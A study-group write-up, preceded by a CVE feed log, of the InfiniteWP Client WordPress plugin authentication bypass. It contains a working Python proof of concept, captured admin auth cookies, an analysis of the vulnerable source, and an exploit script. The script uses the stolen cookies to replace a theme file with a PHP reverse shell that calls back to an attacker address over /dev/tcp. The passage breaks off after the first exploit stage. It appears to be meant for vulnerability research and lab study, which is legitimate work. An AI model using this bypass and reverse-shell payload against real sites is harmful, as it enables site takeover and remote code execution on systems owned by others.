datetime subject id link
2023-10-20 00:05:02.667120 (Path Traversal) CVE-2023-31046 https://cve.report/CVE-2023-31046
2023-10-20 01:05:02.869793 (Remote Code Execution) CVE-2023-35187 https://cve.report/CVE-2023-35187
2023-10-20 01:05:02.931910 (Remote Code Execution) CVE-2023-35186 https://cve.report/CVE-2023-35186
2023-10-20 01:05:02.949623 (Remote Code Execution) CVE-2023-35184 https://cve.report/CVE-2023-35184
2023-10-20 01:05:02.963963 (Remote Code Execution) CVE-2023-35182 https://cve.report/CVE-2023-35182
2023-10-20 01:05:03.028814 (Remote Code Execution) CVE-2023-35180 https://cve.report/CVE-2023-35180
2023-10-20 01:05:03.045259 (Remote Attack, PHP, Execute Arbitrary code) CVE-2023-46042 https://cve.report/CVE-2023-46042
2023-10-20 04:05:03.576221 (Execute Arbitrary code) CVE-2023-39431 https://cve.report/CVE-2023-39431
2023-10-20 04:05:03.638119 (Execute Arbitrary code) CVE-2023-35986 https://cve.report/CVE-2023-35986
2023-10-20 04:05:03.654979 (Execute Arbitrary code) CVE-2023-5059 https://cve.report/CVE-2023-5059
2023-10-20 05:05:02.671035 (Remote Attack) CVE-2023-45992 https://cve.report/CVE-2023-45992
2023-10-20 05:05:02.735578 (PHP, SQL injection) CVE-2023-45826 https://cve.report/CVE-2023-45826
2023-10-20 05:05:02.750891 (Django) CVE-2023-45809 https://cve.report/CVE-2023-45809
2023-10-20 05:05:02.764220 (SQL injection) CVE-2023-45381 https://cve.report/CVE-2023-45381
2023-10-20 05:05:02.823533 (SQL injection) CVE-2023-43986 https://cve.report/CVE-2023-43986
2023-10-20 05:05:02.838137 (XSS) CVE-2023-40153 https://cve.report/CVE-2023-40153
2023-10-20 06:05:02.182917 (Arbitrary Command) CVE-2023-40145 https://cve.report/CVE-2023-40145
2023-10-20 06:05:02.238077 (SQL injection) CVE-2023-45376 https://cve.report/CVE-2023-45376
2023-10-20 06:05:02.254398 (Remote Attack) CVE-2023-27791 https://cve.report/CVE-2023-27791
2023-10-20 07:05:02.735816 (Docker) CVE-2023-45821 https://cve.report/CVE-2023-45821
2023-10-20 07:05:02.750270 (Arbitrary Command) CVE-2023-30131 https://cve.report/CVE-2023-30131
2023-10-20 08:05:02.662403 (XSS) CVE-2023-45819 https://cve.report/CVE-2023-45819
2023-10-20 08:05:02.726749 (XSS) CVE-2023-45818 https://cve.report/CVE-2023-45818
2023-10-20 08:05:02.740970 (GitHub) CVE-2023-45815 https://cve.report/CVE-2023-45815
2023-10-20 08:05:02.754176 (XSS) CVE-2023-45280 https://cve.report/CVE-2023-45280
2023-10-20 08:05:02.767166 (XSS) CVE-2023-45279 https://cve.report/CVE-2023-45279
2023-10-20 08:05:02.833304 (XSS) CVE-2023-43875 https://cve.report/CVE-2023-43875
2023-10-20 08:05:02.846280 (Execute Arbitrary code) CVE-2023-43359 https://cve.report/CVE-2023-43359
2023-10-20 08:05:02.859244 (XSS, Execute Arbitrary code) CVE-2023-43344 https://cve.report/CVE-2023-43344
2023-10-20 08:05:02.872245 (XSS, Execute Arbitrary code) CVE-2023-43342 https://cve.report/CVE-2023-43342
2023-10-20 08:05:02.931282 (XSS, Execute Arbitrary code) CVE-2023-43341 https://cve.report/CVE-2023-43341
2023-10-20 09:05:02.833917 (Remote Code Execution, GitHub) CVE-2023-44385 https://cve.report/CVE-2023-44385
2023-10-20 09:05:02.856564 (XSS, Execute Arbitrary code) CVE-2023-43345 https://cve.report/CVE-2023-43345
2023-10-20 09:05:02.872597 (XSS, Execute Arbitrary code) CVE-2023-43340 https://cve.report/CVE-2023-43340
2023-10-20 09:05:02.927215 (GitHub) CVE-2023-41899 https://cve.report/CVE-2023-41899
2023-10-20 09:05:02.943113 (GitHub) CVE-2023-41898 https://cve.report/CVE-2023-41898
2023-10-20 09:05:02.959032 (Remote Code Execution) CVE-2023-41897 https://cve.report/CVE-2023-41897
2023-10-20 09:05:02.973540 (npm, XSS) CVE-2023-41896 https://cve.report/CVE-2023-41896
2023-10-20 09:05:03.032053 (XSS) CVE-2023-41895 https://cve.report/CVE-2023-41895
2023-10-20 11:05:02.634089 (WordPress, PHP, Critical) CVE-2023-5646 https://cve.report/CVE-2023-5646
2023-10-20 13:05:02.462592 (XSS) CVE-2023-45394 https://cve.report/CVE-2023-45394
2023-10-20 14:05:02.857978 (Remote Code Execution, Vmware) CVE-2023-34051 https://cve.report/CVE-2023-34051
2023-10-20 14:05:02.872184 (PHP, XSS) CVE-2023-46267 https://cve.report/CVE-2023-46267
2023-10-20 14:05:02.937557 (XSS) CVE-2023-45471 https://cve.report/CVE-2023-45471
2023-10-20 15:05:02.887174 (Vmware) CVE-2023-34052 https://cve.report/CVE-2023-34052
2023-10-20 17:05:03.054931 (WordPress) CVE-2023-4943 https://cve.report/CVE-2023-4943
2023-10-20 17:05:03.069229 (WordPress) CVE-2023-4942 https://cve.report/CVE-2023-4942
2023-10-20 17:05:03.158474 (WordPress) CVE-2023-4940 https://cve.report/CVE-2023-4940
2023-10-20 17:05:03.172109 (WordPress) CVE-2023-4937 https://cve.report/CVE-2023-4937
2023-10-20 17:05:03.185604 (WordPress) CVE-2023-4935 https://cve.report/CVE-2023-4935
2023-10-20 17:05:03.225282 (WordPress) CVE-2023-4920 https://cve.report/CVE-2023-4920
2023-10-20 17:05:03.238786 (XSS) CVE-2023-2325 https://cve.report/CVE-2023-2325
2023-10-20 17:05:03.252282 (WordPress, PHP) CVE-2023-4488 https://cve.report/CVE-2023-4488
2023-10-20 18:05:02.655484 (Execute Arbitrary code) CVE-2023-39680 https://cve.report/CVE-2023-39680
2023-10-20 18:05:02.672346 (Remote Code Execution) CVE-2023-5524 https://cve.report/CVE-2023-5524
2023-10-20 18:05:02.725599 (Remote Code Execution) CVE-2023-5523 https://cve.report/CVE-2023-5523
2023-10-20 19:05:03.075122 (Vmware) CVE-2023-34046 https://cve.report/CVE-2023-34046
2023-10-20 19:05:03.135136 (Vmware) CVE-2023-34044 https://cve.report/CVE-2023-34044
2023-10-20 20:05:02.364514 (Remote Attack) CVE-2023-44256 https://cve.report/CVE-2023-44256
2023-10-20 20:05:02.430100 (Vmware) CVE-2023-34045 https://cve.report/CVE-2023-34045
2023-10-20 21:05:02.567898 (WordPress) CVE-2023-4941 https://cve.report/CVE-2023-4941
2023-10-20 21:05:02.630786 (WordPress) CVE-2023-4926 https://cve.report/CVE-2023-4926
2023-10-20 21:05:02.645102 (WordPress) CVE-2023-4924 https://cve.report/CVE-2023-4924
2023-10-20 21:05:02.660718 (WordPress) CVE-2023-4923 https://cve.report/CVE-2023-4923
2023-10-20 21:05:02.723198 (WordPress) CVE-2023-4796 https://cve.report/CVE-2023-4796
2023-10-20 21:05:02.740956 (WordPress) CVE-2023-4668 https://cve.report/CVE-2023-4668
2023-10-20 23:05:02.843061 (PHP, XSS) CVE-2023-46287 https://cve.report/CVE-2023-46287

[Purpose]

- This post was compiled for research purposes, and future posts will also be published for research purposes.

- To improve our skills, we are publishing part of what we summarized in our study group, and we will continue in the same way going forward.

ref

https://blog.sunggwanchoi.com/kor-infinitewp-client-1-9-4-5-authentication-bypass/

Detailed analysis results

Environment setup

WordPress setup

  • wordpress : 4.8.3
  • mysql : 5.7

docker-compose.yml

version: "3.3"
    
services:
  db:
    image: mysql:5.7
    volumes:
      - ./db_data:/var/lib/mysql
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    
  wordpress:
    depends_on:
      - db
    image: wordpress:4.8.3
    volumes:
      - ./wordpress_data:/var/www/html
    ports:
      - "8000:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_DB_NAME: wordpress
docker-compose up -d

Account creation

  • Create an account for the admin user

Installing the vulnerable plugin

How to download a specific version of a plugin

https://downloads.wordpress.org/plugin/<plugin_name>.<version>.zip
https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip

How to raise the file upload size limit

  • Install the Increase Maximum Upload File Size and WP File Manager plugins
  • Add the following to .htaccess
  • php_value upload_max_filesize 32M
    php_value post_max_size 64M
    php_value memory_limit 128M
    php_value max_execution_time 300
    php_value max_input_time 300

Install the iwp-client plugin (the 1.9.4.4 zip above, i.e. a version below the fixed 1.9.4.5)

Target

  • Name : InfiniteWP Client (iwp-client)
  • Type : WordPress plugin
  • Version : < 1.9.4.5
  • Function : plugin for managing and monitoring multiple WordPress sites from one panel

Vulnerability

Description

  • Authentication bypass vulnerability
  • If an attacker knows the username of a WordPress user, they can obtain that user's authentication cookies without the password

Payload

{"iwp_action": "add_site", "params": {"username": "admin"}}

Where the vulnerability occurs

  • File : init.php
  • Function : iwp_mmb_set_request

Running the PoC

PoC code

import argparse
import requests

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="URL of the target WordPress site.")
args = parser.parse_args()

url = args.url
# _IWP_JSON_PREFIX_ followed by base64('{"iwp_action":"add_site","params":{"username":"admin"}}')
data = '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Prepare the request object
request = requests.Request('POST', url, data=data, headers=headers)
prepared_request = request.prepare()

# Print the packet (Burp Suite style)
print("=== Request ===")
print(f"{prepared_request.method} {prepared_request.path_url} HTTP/1.1")
for header, value in prepared_request.headers.items():
    print(f"{header}: {value}")
print()
print(prepared_request.body)
print()

# Send the request
response = requests.Session().send(prepared_request)

# Print the response packet (raw.version is an int such as 11 for HTTP/1.1)
print("\n=== Response ===")
print(f"HTTP/{response.raw.version // 10}.{response.raw.version % 10} {response.status_code} {response.reason}")
for header, value in response.headers.items():
    print(f"{header}: {value}")
print()
if response.content:
    print(response.content.decode())
print()

# <IWPHEADER> only proves that the IWP client answered; the Set-Cookie header is the real sign of the bypass
if 'IWPHEADER' in response.text:
    print('\n[+] Vulnerable')
else:
    print('\n[+] Not vulnerable')

Execution result

python .\poc.py -u http://localhost:8000
=== Request ===
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==

=== Response ===
HTTP/1.1 200 OK
Date: Sat, 09 Sep 2023 06:14:06 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.0.30
Set-Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-content/plugins; HttpOnly, wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-admin; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7Ca095bf77a2d4a9697d0b8859a16435bb44e0245bebbf1d70a8897b68b0b9920b; path=/; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-content/plugins; secure; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-admin; secure; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7C399a76985c0c86303848f480390bad5a4166268ca4b7a62d2de1c42e83b44c47; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 162
Content-Type: text/plain;charset=UTF-8

<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>

[+] Vulnerable

Request

=== Request ===
POST /wp-admin/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
  • Decoded payload: {"iwp_action":"add_site","params":{"username":"admin"}}

Response

=== Response ===
HTTP/1.1 200 OK
Date: Sat, 09 Sep 2023 06:14:06 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.0.30
Set-Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-content/plugins; HttpOnly, wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-admin; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7Ca095bf77a2d4a9697d0b8859a16435bb44e0245bebbf1d70a8897b68b0b9920b; path=/; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-content/plugins; secure; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-admin; secure; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7C399a76985c0c86303848f480390bad5a4166268ca4b7a62d2de1c42e83b44c47; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 162
Content-Type: text/plain;charset=UTF-8

<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>
  • The cookies carrying the admin user's authentication are returned via Set-Cookie (both the plain wordpress_/wordpress_logged_in_ cookies and the wordpress_sec_ variants, because on HTTP the plugin sets them twice, once with $secure = false and once with $secure = true)
  • The body decodes to {"error":"Invalid activation key","error_code":"iwp_mmb_add_site_invalid_activation_key"}

Summary

Sending {"iwp_action":"add_site","params":{"username":"admin"}} makes WordPress answer with an invalid_activation_key error, but the admin user's authentication cookies are returned together with that error. The request carried nothing but a username: no password, no activation key and no public key.
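The PoC above reports "Vulnerable" as soon as <IWPHEADER> appears in the body, but that marker only shows that an IWP client parsed the JSON; a patched client answers the same way. What actually demonstrates the bypass is a wordpress_logged_in_* cookie for the requested user in Set-Cookie. The following added example (my own code, not from the original post, the referenced blog, or the InfiniteWP plugin) builds the same _IWP_JSON_PREFIX_ payload, decodes the IWP response envelope, parses the WordPress auth cookies into user/expiry/token/hmac, and classifies the target from those two signals. The regexes for the cookie names and the envelope, the classification labels and the probe() helper are my assumptions; the sample body and Set-Cookie values are copied from the capture above (Set-Cookie shortened to two cookies).

```python
"""Build the IWP add_site probe and judge the answer by the cookies it returns.

Added example; not part of the original post or of the InfiniteWP plugin. It
assumes only the wire format visible in the captures above:
  request : _IWP_JSON_PREFIX_<base64 JSON>
  response: <IWPHEADER>_IWP_JSON_PREFIX_<base64 JSON><ENDIWPHEADER>
  cookies : wordpress_logged_in_<md5>=user|expiry|token|hmac (URL-encoded)
"""
import base64
import json
import re
from datetime import datetime, timezone
from urllib.parse import unquote

IWP_PREFIX = "_IWP_JSON_PREFIX_"

# WordPress auth cookie names: wordpress_<hash>, wordpress_sec_<hash>, wordpress_logged_in_<hash>
WP_COOKIE_RE = re.compile(r"(wordpress(?:_sec|_logged_in)?_[0-9a-f]{32})=([^;,\s]+)")
IWP_BODY_RE = re.compile(r"<IWPHEADER>(.*?)<ENDIWPHEADER>", re.S)


def build_iwp_payload(username, action="add_site"):
    """Encode the request the way the IWP admin panel does (prefix + base64 of compact JSON)."""
    body = json.dumps({"iwp_action": action, "params": {"username": username}},
                      separators=(",", ":"))
    return IWP_PREFIX + base64.b64encode(body.encode()).decode()


def decode_iwp_response(text):
    """Return the JSON object wrapped in <IWPHEADER>...<ENDIWPHEADER>, or None if absent."""
    m = IWP_BODY_RE.search(text)
    if not m or IWP_PREFIX not in m.group(1):
        return None
    b64 = m.group(1).split(IWP_PREFIX, 1)[1]
    return json.loads(base64.b64decode(b64).decode().strip())


def parse_wp_auth_cookies(set_cookie_headers):
    """Split every WordPress auth cookie into its user|expiry|token|hmac fields."""
    cookies = []
    for header in set_cookie_headers:
        for name, value in WP_COOKIE_RE.findall(header):
            parts = unquote(value).split("|")
            if len(parts) < 2 or not parts[1].isdigit():
                continue  # not a WordPress auth cookie value
            expiry = int(parts[1])
            cookies.append({
                "name": name,
                "user": parts[0],
                "expires": expiry,
                "expires_utc": datetime.fromtimestamp(expiry, tz=timezone.utc).isoformat(),
            })
    return cookies


def classify(username, body_text, set_cookie_headers):
    """'vulnerable' only when a logged_in cookie for the requested user came back.

    Any IWP client that parses JSON answers with <IWPHEADER>; the Set-Cookie
    header for the requested user is the proof that the bypass worked.
    """
    if decode_iwp_response(body_text) is None:
        return "no-iwp-client"
    logged_in = [c for c in parse_wp_auth_cookies(set_cookie_headers)
                 if c["name"].startswith("wordpress_logged_in_") and c["user"] == username]
    return "vulnerable" if logged_in else "iwp-client-no-bypass"


# Sample data copied from the capture above (body verbatim, Set-Cookie shortened to two cookies).
SAMPLE_BODY = "<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>"
SAMPLE_SET_COOKIE = [
    "wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-admin; HttpOnly, "
    "wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7Ca095bf77a2d4a9697d0b8859a16435bb44e0245bebbf1d70a8897b68b0b9920b; path=/; HttpOnly",
]


def probe(url, username, timeout=10):
    """Live check against a site you are authorized to test (needs the requests package)."""
    import requests  # imported here so the rest of the module stays offline-runnable
    resp = requests.post(url, data=build_iwp_payload(username),
                         headers={"Content-Type": "application/x-www-form-urlencoded"},
                         timeout=timeout)
    # requests joins several Set-Cookie headers with ", "; the regex copes with that form.
    return classify(username, resp.text, [resp.headers.get("Set-Cookie", "")])


if __name__ == "__main__":
    print(build_iwp_payload("admin"))
    print(decode_iwp_response(SAMPLE_BODY))
    for c in parse_wp_auth_cookies(SAMPLE_SET_COOKIE):
        print(c["name"], c["user"], c["expires_utc"])
    print(classify("admin", SAMPLE_BODY, SAMPLE_SET_COOKIE))
```

Run it as-is to see the offline sample classified; probe(url, username) performs the live request. The expiry is the second cookie component; in the capture it is two days after the response Date, which is WordPress's default session length without "remember me", so the stolen cookie stays usable for that long even though the plugin reported an error.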

Analysis of the vulnerable source code

Vulnerable functions

  • iwp_mmb_set_request()
  • iwp_mmb_parse_request()

Files containing the vulnerable functions

❯ grep -ri "iwp_mmb_set_request" .
./init.php:if (!function_exists ('iwp_mmb_set_request')) {
./init.php:     function iwp_mmb_set_request(){
./core.class.php:               add_action('setup_theme', 'iwp_mmb_set_request');
  • init.php
    • the file where iwp_mmb_set_request is defined
  • core.class.php
    • registers iwp_mmb_set_request on the setup_theme action, so it runs early on every request

iwp_mmb_set_request

function iwp_mmb_set_request(){
		global $current_user, $iwp_mmb_core, $new_actions, $wp_db_version, $wpmu_version, $_wp_using_ext_object_cache, $iwp_mmb_activities_log;
		if (is_user_logged_in()) {
			iwp_plugin_compatibility_fix();
		}
		if (empty($iwp_mmb_core->request_params)) {
			return false;
		}
		$params = $iwp_mmb_core->request_params;
		$action = $iwp_mmb_core->request_params['iwp_action'];
  • Request : {"iwp_action":"add_site","params":{"username":"admin"}}
    • request_params : {"username":"admin","iwp_action":"add_site"} (the params object, with iwp_action copied into it by iwp_mmb_parse_request)
    • request_params['iwp_action'] : "add_site"
if(isset($params['username']) && !is_user_logged_in()){
			$user = function_exists('get_user_by') ? get_user_by('login', $params['username']) : iwp_mmb_get_user_by( 'login', $params['username'] );
			if (isset($user) && isset($user->ID)) {
				wp_set_current_user($user->ID);
				// Compatibility with All In One Security
				update_user_meta($user->ID, 'last_login_time', current_time('mysql'));
			}
			$isHTTPS = (bool)is_ssl();
			if($isHTTPS){
				wp_set_auth_cookie($user->ID);
			}else{
				wp_set_auth_cookie($user->ID, false, false);
				wp_set_auth_cookie($user->ID, false, true);
			}
		}
  • Checks that the username parameter is set and that the request is NOT already logged in (!is_user_logged_in())
    • username: admin, and the attacker's request carries no cookie, so this branch is taken
  • If get_user_by exists, it loads the user record for that username; otherwise the plugin's own iwp_mmb_get_user_by() does the lookup
    • If a user with that name exists, wp_set_current_user() makes it the current user and last_login_time is written to the user's meta
  • If the site is served over HTTPS, wp_set_auth_cookie($user->ID) sets the auth cookies with the default options
  • If the site is served over HTTP, wp_set_auth_cookie is called twice, with $secure = false and then $secure = true (the second and third arguments are $remember and $secure), which is why the response above carries both the wordpress_ and the wordpress_sec_ cookies; HttpOnly is set by WordPress in both cases
  • Nothing in this path verifies a password, activation key or signature

※ Authentication is performed on the username alone.

 This is the security flaw.

iwp_mmb_parse_request

global $current_user, $iwp_mmb_core, $new_actions, $wp_db_version, $wpmu_version, $_wp_using_ext_object_cache;
		if (strrpos($HTTP_RAW_POST_DATA_LOCAL, '_IWP_JSON_PREFIX_') !== false) {
			$request_data_array = explode('_IWP_JSON_PREFIX_', $HTTP_RAW_POST_DATA_LOCAL);
			$request_raw_data = $request_data_array[1];
			$data = trim(base64_decode($request_raw_data));
			$GLOBALS['IWP_JSON_COMMUNICATION'] = 1;
		}else{
			$data = false;
			$request_raw_data = $HTTP_RAW_POST_DATA_LOCAL;
			$serialized_data = trim(base64_decode($request_raw_data));
			if (is_serialized($serialized_data)) {
					iwp_mmb_response(array('error' => 'Please update your IWP Admin Panel to latest version', 'error_code' => 'update_panel'), false, true);
			}
		}
  • Function that parses the request sent by the client
  • Checks whether the string '_IWP_JSON_PREFIX_' is present in $HTTP_RAW_POST_DATA_LOCAL
    • If present:
      • Splits the body on _IWP_JSON_PREFIX_
      • Takes the second piece, base64-decodes it and trims surrounding whitespace
      • Sets the global $GLOBALS['IWP_JSON_COMMUNICATION'] = 1 to mark this as JSON communication
    • If absent:
      • Treats the body as the old serialized format; if it base64-decodes to serialized data, responds with the 'Please update your IWP Admin Panel to latest version' error

 When writing the PoC, the body has to be in the form _IWP_JSON_PREFIX_<Base64> for the IWP plugin to process it.

if (!$iwp_mmb_core->check_if_user_exists($params['username']))
				iwp_mmb_response(array('error' => 'Username <b>' . $params['username'] . '</b> does not have administrative access. Enter the correct username in the site options.', 'error_code' => 'username_does_not_have_administrative_access'), false);
			
			if ($action == 'add_site') {
				$params['iwp_action'] = $action;
				$iwp_mmb_core->request_params = $params;
				return;
			}
  • Checks with check_if_user_exists() whether the username from the parameters is an administrator; if not, returns the 'does not have administrative access' error
  • If $action is 'add_site':
    • stores $action in $params['iwp_action']
    • stores $params in request_params and returns, so that iwp_mmb_set_request picks it up

 Here too, the only check is that a user with that name exists and has administrative access; nothing proves that the requester is that user.

 This is the security flaw.

iwp_mmb_add_site

if( !function_exists ( 'iwp_mmb_add_site' )) {
	function iwp_mmb_add_site($params)
	{
		global $iwp_mmb_core, $iwp_mmb_activities_log;
		$num = extract($params);
		
		if ($num) {
			if (!$iwp_mmb_core->get_option('iwp_client_action_message_id') && !$iwp_mmb_core->get_option('iwp_client_public_key')) {
				$public_key = base64_decode($public_key);
				
				
				if(trim($activation_key) != get_option('iwp_client_activate_key')){ //iwp
					iwp_mmb_response(array('error' => 'Invalid activation key', 'error_code' => 'iwp_mmb_add_site_invalid_activation_key'), false);
					return;
				}
  • This is where the 'Invalid activation key' error seen in the response comes from. By the time this check runs, iwp_mmb_set_request (hooked on setup_theme) has already called wp_set_auth_cookie, so failing the activation-key check does not take the cookies back; the error body and the Set-Cookie headers travel in the same response.

Building the exploit

  1. Take the URL and the administrator's username from the user.
  2. Use the IWP payload to obtain the administrator's cookies from the target WordPress site.
  3. Use the administrator's cookies to deliver a reverse shell.
  4. Use the Theme Editor to replace archive.php with the reverse shell.
  5. Visiting that page triggers the reverse shell.

main

arg = parseArguments()
baseUrl = arg.u
username = arg.n
themeName = arg.t
  • python .\cve-2020-8772.py -u http://127.0.0.1:8000 -n admin -t twentyseventeen
    • baseUrl = http://127.0.0.1:8000
    • username = admin
    • themeName = twentyseventeen
######### CHANGE ME !!! #########
payload = """<?php exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.35.15/4444 0>&1'");"""
######### CHANGE ME !!! #########
Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix . :
   Link-local IPv6 Address . . . . . : fe80::cf75:83a3:efa1:feca%4
   IPv4 Address. . . . . . . . . . . : 192.168.35.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.35.1
  • payload → PHP that opens a reverse shell back to the attacker's PC (the ipconfig output above shows its address, 192.168.35.15, listening on port 4444)
print("[DEBUG] baseUrl - ", baseUrl)
print("[DEBUG] username - ", username)
print("[DEBUG] themeName - ", themeName)
print("[DEBUG] Payload - ", payload)
print("[DEBUG] (Make sure to change the payload)")
print()
[DEBUG] baseUrl -  http://127.0.0.1:8000
[DEBUG] username -  admin
[DEBUG] themeName -  twentyseventeen
[DEBUG] Payload -  <?php exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.35.15/4444 0>&1'");
[DEBUG] (Make sure to change the payload)
  • Prints the debug messages
# Setting up basic url, header, payload for the attack
if baseUrl[-1] == '/':
    baseUrl = baseUrl[:-1]

header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537"}
iwpPayload = '{"iwp_action":"add_site","params":{"username":"' + username + '"}}'
iwpPayload = "_IWP_JSON_PREFIX_" + base64.b64encode(iwpPayload.encode('ascii')).decode('utf-8')

session = requests.session()
  • Sets iwpPayload so that the add_site action, whose user check is broken, is handled as the admin user
  • Wraps it as _IWP_JSON_PREFIX_ + <encoded_payload> so that iwp_mmb_parse_request accepts it
  • Creates a requests Session, which keeps the Set-Cookie values returned by the bypass and sends them on the later requests
print("[+] Stage1: IWP Exploit & Sanity Check")
result = iwpExploit(session, baseUrl, header, iwpPayload)
print()

print("[+] Stage2: Getting Nonce")
nonce = getNonce(session, baseUrl, header, themeName)
if (nonce == False):
    print("[-] Stage 2 failed. Exiting.")
    exit(1)
print()

print("[+] Stage3: Injecting Payload into archive.php")
result = injectPayload(session, baseUrl, header, nonce, payload, themeName)
if (result == False):
    print("[-] Stage 3 failed. Exiting.")
    exit(1)
print()
  • [1] Confirm that /wp-admin can be reached as the admin user
  • [2] Harvest the nonce value
  • [3] Overwrite the archive.php page with the payload to get the reverse shell
finalUrl = baseUrl + "/wp-content/themes/" + themeName + "/archive.php"
print("[+] Exploitation Successful. Open up netcat listener & Visit the following URL\n")
print("[+] Visit --> ", finalUrl, "\n")
  • After the attack succeeds, opening the printed URL connects the reverse shell

iwpExploit

def iwpExploit(session, url, header, data):
    """ 
    Exploit IWP vulnerability. All auth_cookie is stored in "session"

    :return:bool:Return True/False based on visiting the endpoint 
    """
    url = url + "/wp-admin/"
    print("[+] Trying " + url + " with IWP payload : " + data)

    try:
        res = session.post(url, headers=header, data=data)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: " + str(e))
        exit(1)
    
    return True
[+] Stage1: IWP Exploit & Sanity Check
